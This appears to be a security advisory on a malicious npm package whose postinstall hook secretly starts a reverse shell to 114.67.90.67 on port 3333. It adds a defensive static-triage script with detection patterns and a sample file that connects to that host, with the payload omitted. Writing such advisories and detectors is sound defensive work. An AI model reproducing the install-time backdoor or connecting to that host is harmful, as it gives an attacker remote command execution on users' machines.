MAL-2026-6216
Malicious code in aikaf668897 (npm)
Details
## Source: amazon-inspector (450730a92143c06530923dacda588a17252ebc7edc9ddf71ff520446de5a3293)

On `npm install`, the package's postinstall hook (`node scripts/postinstall.js`) spawns a detached background Node process running `scripts/shell.js` with `detached: true, stdio: 'ignore', windowsHide: true` and `.unref()`, so the child survives npm install completion and runs invisibly.

`scripts/shell.js` opens a TCP socket to the hardcoded bare IP `114.67.90.67` on port `3333` and pipes a local shell (`/bin/sh` on Unix, `powershell.exe` with hidden window on Windows) stdin/stdout/stderr to that socket, with a 10-second reconnect loop. This is an unambiguous reverse-shell backdoor giving the operator of 114.67.90.67 interactive command execution on the installer's machine.

The package's advertised purpose (a string-manipulation utility, with `index.js` exporting unrelated capitalize/truncate/camelCase helpers) is a cover story; the install-time payload has nothing to do with the documented API.
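The install-time behaviour described above can be triaged statically from an unpacked tarball, without running `npm install`. The check below is an added example, not code from the advisory or its source; `auditPackage`, the indicator names and the sample package contents are assumptions constructed for illustration, and the payload body is deliberately omitted from the sample.

```javascript
// Heuristic static triage of npm install-time hooks (added example; executes nothing).
const HOOKS = ['preinstall', 'install', 'postinstall'];
const INDICATORS = [
  ['detached-spawn', /detached\s*:\s*true/],
  ['ignored-stdio', /stdio\s*:\s*['"]ignore['"]/],
  ['hidden-window', /windowsHide\s*:\s*true/],
  ['unref', /\.unref\s*\(/],
  ['raw-socket', /\bnet\.(connect|createConnection)\s*\(|new\s+(net\.)?Socket\s*\(/],
  ['bare-ipv4', /\b(?:\d{1,3}\.){3}\d{1,3}\b/], // may also match dotted version strings
];

// Local script paths named in a command or source text, e.g. "node scripts/postinstall.js".
function scriptsIn(text) {
  return text.match(/[\w./-]+\.(?:c|m)?js\b/g) || [];
}

// files: { relativePath: contents } for one unpacked package.
function auditPackage(files) {
  const manifest = JSON.parse(files['package.json'] || '{}');
  const findings = [];
  const seen = new Set();
  const queue = [];
  for (const hook of HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (!cmd) continue;
    findings.push({ file: 'package.json', indicator: `hook:${hook}` });
    queue.push(...scriptsIn(cmd));
  }
  while (queue.length) {
    const file = queue.shift().replace(/^\.\//, '');
    if (seen.has(file) || !(file in files)) continue;
    seen.add(file);
    for (const [name, re] of INDICATORS) {
      if (re.test(files[file])) findings.push({ file, indicator: name });
    }
    queue.push(...scriptsIn(files[file])); // follow scripts the hook itself launches
  }
  return findings;
}

// Constructed sample mirroring the advisory's description; not the real package files.
const SAMPLE = {
  'package.json': '{"name":"example-pkg","scripts":{"postinstall":"node scripts/postinstall.js"}}',
  'scripts/postinstall.js': "require('child_process').spawn(process.execPath, ['scripts/shell.js'], { detached: true, stdio: 'ignore', windowsHide: true }).unref();",
  'scripts/shell.js': "const net = require('net'); const s = net.connect(3333, '114.67.90.67'); /* rest omitted */",
};

console.log(auditPackage(SAMPLE));
```

Any hit is a prompt for manual review rather than a verdict; installing with `npm install --ignore-scripts` keeps lifecycle hooks from running while a package is being examined.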
Affected packages
No fixed version published yet for aikaf668897 (npm). Pin to a known-safe version or switch to an alternative.